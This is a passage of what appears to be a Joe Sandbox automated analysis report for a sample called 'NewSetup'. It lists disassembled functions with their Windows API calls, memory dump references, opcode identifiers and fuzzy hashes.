                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst
                                                                                                      • String ID:
                                                                                                      • API String ID: 1974802433-0
                                                                                                      • Opcode ID: ffb2812a462499f6f234b8db4a53db3e548ee7180f14de5163ed6ba54365a1bf
                                                                                                      • Instruction ID: b8b0a968a795184fe3148dd8b43108f981ff209820518f5900058d2e2a35ee7f
                                                                                                      • Opcode Fuzzy Hash: ffb2812a462499f6f234b8db4a53db3e548ee7180f14de5163ed6ba54365a1bf
                                                                                                      • Instruction Fuzzy Hash: 9B7106F192516AAFDF259F38DC8DAFAB7B9AB05300F1441D9E548A3211DB318E99CF10
                                                                                                      Function 0021F8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0021F8F5
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0021F9C1
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0021F9DA
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0021F9E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 254469556-0
                                                                                                      • Opcode ID: 610ac620df78359d5bc2e7c895bee6cac9fa160d7ce336519302b15cc80a53c5
                                                                                                      • Instruction ID: 09cf83fd3a340b85b75645ac4b44f10f89b445856811cb8c842bc576a7c036eb
                                                                                                      • Opcode Fuzzy Hash: 610ac620df78359d5bc2e7c895bee6cac9fa160d7ce336519302b15cc80a53c5
                                                                                                      • Instruction Fuzzy Hash: DC31F9B5D11219EBDF61EFA4D9497CDBBF8AF18300F1041AAE40CAB250EB719A84CF45
                                                                                                      Function 00231580 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002315D4
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0023161E
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002316E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 661929714-0
                                                                                                      • Opcode ID: 25e6a69a1df5b5e9afc18e4ed5ba1f473964f47ea66419efae0a54f935322ba5
                                                                                                      • Instruction ID: 5b03b49360cdb06800ddaaa29e4b3632622eca9afee0ebccc1d16c83e5772cc9
                                                                                                      • Opcode Fuzzy Hash: 25e6a69a1df5b5e9afc18e4ed5ba1f473964f47ea66419efae0a54f935322ba5
                                                                                                      • Instruction Fuzzy Hash: AD61D3B15202179FDB289F64DC82BBAB3A8EF05700F28817AED05C6285E774D9B1CF50
                                                                                                      Function 00227E30 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00227F28
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00227F32
                                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00227F3F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                      • String ID:
                                                                                                      • API String ID: 3906539128-0
                                                                                                      • Opcode ID: d8238e58ab2cec41af8983a7323540d3337842f72890db51bcfa704cabd4b861
                                                                                                      • Instruction ID: 1bda85965df263d4871b545387a48f584110f64a901fb0ca0171fe5af0d7e875
                                                                                                      • Opcode Fuzzy Hash: d8238e58ab2cec41af8983a7323540d3337842f72890db51bcfa704cabd4b861
                                                                                                      • Instruction Fuzzy Hash: DD31D274911229ABCB21DF64ED887CDBBB8BF18310F5042EAE41CA7290E7709F958F45
                                                                                                      Function 002200B4 Relevance: 3.0, APIs: 2, Instructions: 27timeCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemTimePreciseAsFileTime.KERNEL32 ref: 002200EC
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,456001D6,00218E30,?,0023BE77,000000FF,?,0021FDB4,?,00000000,00000000,?,0021FDD8,?,00218E30,?), ref: 002200F0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$FileSystem$Precise
                                                                                                      • String ID:
                                                                                                      • API String ID: 743729956-0
                                                                                                      • Opcode ID: 88b76494bcf822b25fad04837d2dbb10c7b2638f5b52f2bbf91ac49e3b19fc8a
                                                                                                      • Instruction ID: 76fdc37d4b45322c0193312c69d1e12a1f6892df217d27673afef78c698f0275
                                                                                                      • Opcode Fuzzy Hash: 88b76494bcf822b25fad04837d2dbb10c7b2638f5b52f2bbf91ac49e3b19fc8a
                                                                                                      • Instruction Fuzzy Hash: 0DF0E536A44664EFCB028F48EC48F5EB7A8F70AB14F01012AEC0293790CF74A900DB80
                                                                                                      Function 00223FB2 Relevance: 2.8, Strings: 2, Instructions: 318COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (="$0
                                                                                                      • API String ID: 0-3643469856
                                                                                                      • Opcode ID: 51028673bfcbc76e5d970baa14f3a0408980f990aa235931a3d4e5a395116e54
                                                                                                      • Instruction ID: 8313f79afbefb62746cfc66ce7b985912807bc09ff9714f2f847a559958725d5
                                                                                                      • Opcode Fuzzy Hash: 51028673bfcbc76e5d970baa14f3a0408980f990aa235931a3d4e5a395116e54
                                                                                                      • Instruction Fuzzy Hash: 74B12930920637ABCB28EFE8E5556BE7BB1AF04300F14061EEA5697640C775EEB1CB51
                                                                                                      Function 00235C5E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00235BB9,?,?,00000008,?,?,0023BCAB,00000000), ref: 00235E8B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise
                                                                                                      • String ID:
                                                                                                      • API String ID: 3997070919-0
                                                                                                      • Opcode ID: f9cbe12ec94f626a9729335191d2d0ecd45748bc90285cd99f5cd94dde99b3f2
                                                                                                      • Instruction ID: a2715614fbd9895a9b86c9e681603d7c443825d97077940a8f1e195b37ca0cf6
                                                                                                      • Opcode Fuzzy Hash: f9cbe12ec94f626a9729335191d2d0ecd45748bc90285cd99f5cd94dde99b3f2
                                                                                                      • Instruction Fuzzy Hash: 10B170B1620A19DFD715CF28C48AB657BE0FF45364F298658E89DCF2A1C335D9A1CB40
                                                                                                      Function 0021F555 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0021F56B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 2325560087-0
                                                                                                      • Opcode ID: 6e08a618209ddacac3f6ab3a96559bdffe2e9f451d21c916d68213b7c8d1b0a5
                                                                                                      • Instruction ID: 3e196c2f56c8a0bd1b71889499d70a8b7b3ea6c9da74db7bd0a1efde7b8f2eb9
                                                                                                      • Opcode Fuzzy Hash: 6e08a618209ddacac3f6ab3a96559bdffe2e9f451d21c916d68213b7c8d1b0a5
                                                                                                      • Instruction Fuzzy Hash: 84A1B076E112058FDB59CF68E889799BBF4FB59320F25822AD421EB364C374D880CF50
                                                                                                      Function 00231F38 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022D2B4: HeapAlloc.KERNEL32(00000008,?,?,?,0022C1B7,00000001,00000364,?,00000006,000000FF,?,00225495,00248E38,0000000C), ref: 0022D2F5
                                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002320D9
                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 002321CD
                                                                                                      • FindClose.KERNEL32(00000000), ref: 0023220C
                                                                                                      • FindClose.KERNEL32(00000000), ref: 0023223F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 2701053895-0
                                                                                                      • Opcode ID: 6706de161c113103a40b47c15ba4f243d7d0f4235df2171f64b2093d4e16f2db
                                                                                                      • Instruction ID: 91218d6e5401488f662ebfc00c1af9e81ae75bf85301a630b7355da18beb583a
                                                                                                      • Opcode Fuzzy Hash: 6706de161c113103a40b47c15ba4f243d7d0f4235df2171f64b2093d4e16f2db
                                                                                                      • Instruction Fuzzy Hash: 695176F592421AAFDF249F789C85AFEB7B9DF45304F144199F84893201EB308D6A9F20
                                                                                                      Function 00231840 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00231894
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 3736152602-0
                                                                                                      • Opcode ID: 9b74feb06f409f2c7ae2c062146637f8547bb530f69f57bc8ca2a6342bc80178
                                                                                                      • Instruction ID: 9f0ce85bc90e1a02dd78e10035180f3fbb2677be385030dc00fb48d1c5f86893
                                                                                                      • Opcode Fuzzy Hash: 9b74feb06f409f2c7ae2c062146637f8547bb530f69f57bc8ca2a6342bc80178
                                                                                                      • Instruction Fuzzy Hash: 0D21D6B2620217ABEB18AF25EC41ABA73A8EF04710F20407AFD02C6141EB34DD708B54
                                                                                                      Function 002314D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • EnumSystemLocalesW.KERNEL32(00231580,00000001,00000000,?,-00000050,?,00231363,00000000,-00000002,00000000,?,00000055,?), ref: 0023154A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2417226690-0
                                                                                                      • Opcode ID: 463cf898c6361f9644dd2bcea27f40ca389538b371b24d1001249ca4ce28f8c1
                                                                                                      • Instruction ID: 5ee2117966f841114600d95bb2dd54377beac25650585e6cd98abbf6566c0ba0
                                                                                                      • Opcode Fuzzy Hash: 463cf898c6361f9644dd2bcea27f40ca389538b371b24d1001249ca4ce28f8c1
                                                                                                      • Instruction Fuzzy Hash: 3111257B2103015FDB18AF39C8916BAB792FF80768F14442DE98787B40E771B962CB40
                                                                                                      Function 00231960 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002319B4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 3736152602-0
                                                                                                      • Opcode ID: c920d2c88f15dcef94f0e93a9e39c870686247efdff0ceca63827ec3528b47ea
                                                                                                      • Instruction ID: 7097a8ad8c89ad327a2f25b6149faedc9d788fdf027b5b22b87ca039a40777a0
                                                                                                      • Opcode Fuzzy Hash: c920d2c88f15dcef94f0e93a9e39c870686247efdff0ceca63827ec3528b47ea
                                                                                                      • Instruction Fuzzy Hash: 4E11E072621216ABDB14AF68DC56AAA73ECEF05710F20417AE502C7181EB34E9608B50
                                                                                                      Function 00231B0D Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0023179C,00000000,00000000,?), ref: 00231B39
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 3736152602-0
                                                                                                      • Opcode ID: 648f7f2295352d962e0b02f88c1177d02d1aa3d651c32e55133544bdd1ababd0
                                                                                                      • Instruction ID: eb2481c3e6bdd139436700bf55fd9b9404a42c4d9821ff12ae7374cccb28b1de
                                                                                                      • Opcode Fuzzy Hash: 648f7f2295352d962e0b02f88c1177d02d1aa3d651c32e55133544bdd1ababd0
                                                                                                      • Instruction Fuzzy Hash: 4A01D676620113ABDB285B658C0AABAB769EF40758F154429ED06A3180FA70EE71CA90
                                                                                                      Function 002317D3 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • EnumSystemLocalesW.KERNEL32(00231840,00000001,?,?,-00000050,?,0023132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0023181D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2417226690-0
                                                                                                      • Opcode ID: 6ab560fa21cd61b7655dfdcbeb8d0b603ffc90d2e0ee83cb8126bf17d791ce7e
                                                                                                      • Instruction ID: 0f9c5d2f1a6fec379c84f25e062be3c9c64a88e078469cadac2414fc452667c0
                                                                                                      • Opcode Fuzzy Hash: 6ab560fa21cd61b7655dfdcbeb8d0b603ffc90d2e0ee83cb8126bf17d791ce7e
                                                                                                      • Instruction Fuzzy Hash: F8F046763103041FDB246F79EC85A7ABB91EF81B68F14842DF9054B680C6B19C62CB50
